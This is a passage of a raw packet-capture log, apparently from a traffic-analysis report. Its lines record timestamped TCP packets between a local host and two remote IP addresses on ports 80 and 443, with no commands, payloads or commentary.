                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.569667101 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.570303917 CET63831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.570317984 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.571868896 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.571887970 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.572221041 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.572226048 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.590214968 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593529940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593549967 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593561888 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593588114 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593596935 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593616009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593624115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593646049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593656063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593657017 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593667984 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593683004 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593698978 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593745947 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593760014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593770981 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593780994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593781948 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593794107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593815088 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593825102 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593854904 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593866110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593875885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593898058 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.593909025 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594028950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594048023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594058037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594069004 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594083071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594094038 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594168901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594180107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594188929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594208002 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594214916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594219923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594225883 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594237089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594238043 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594249964 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594259977 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594259977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594273090 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594281912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594294071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594317913 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594325066 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594331026 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594358921 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594364882 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594368935 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594389915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594398975 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594405890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594428062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594439030 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594455004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594465017 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594474077 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594490051 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594495058 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594674110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594685078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594696045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594712973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594738007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594749928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594753981 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594780922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594783068 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594790936 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.594822884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595102072 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595148087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595151901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595164061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595195055 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595213890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595225096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595236063 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595247030 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595262051 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595273018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595344067 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595355988 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595366955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595377922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595387936 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595391035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595400095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595406055 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595419884 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595426083 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595429897 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595447063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595447063 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595459938 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595468998 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595469952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595479965 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595480919 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595493078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595501900 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595503092 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595515966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595525980 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595539093 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595546961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595555067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595562935 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595571995 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595583916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595585108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595596075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595603943 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595607996 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595618010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595624924 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595629930 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595632076 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595643044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595659971 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595660925 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595673084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595675945 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595685005 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595700026 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595716000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595762014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595839024 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595882893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595895052 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595906019 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595916986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595926046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595928907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595941067 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595946074 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595951080 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595963955 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.595993042 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596074104 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596084118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596093893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596113920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596115112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596126080 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596152067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596164942 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596182108 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596193075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596201897 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596216917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596216917 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596227884 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596242905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596256018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596261978 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596292973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596358061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596369982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596379995 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596390963 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596401930 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596405029 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596414089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596415043 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596434116 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596445084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596456051 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596463919 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596467972 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596479893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596483946 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596498013 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.596517086 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.601491928 CET63833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.601512909 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.603497028 CET63833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.603502035 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612282038 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612306118 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612343073 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612371922 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612417936 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612593889 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612610102 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612622023 CET63830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.612627983 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642246962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642260075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642276049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642324924 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642359972 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642488956 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642549992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642560959 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642570972 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642590046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642621994 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642895937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642950058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642961979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.642990112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643043995 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643054008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643065929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643078089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643088102 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643095016 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643100977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643102884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643112898 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643125057 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643127918 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643142939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643155098 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643157959 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643165112 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643176079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643178940 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643193960 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643199921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643205881 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643217087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643219948 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643232107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643241882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643241882 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643259048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643270016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643275023 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643281937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643286943 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643330097 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643336058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643347979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643357992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643374920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643376112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643399000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643420935 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643426895 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643439054 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643449068 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643460989 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643470049 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643496037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643544912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643584013 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643604994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643616915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643649101 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643687963 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643697977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643707991 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643718958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643729925 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643729925 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643740892 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643748999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643760920 CET8063819185.215.113.16192.168.2.4
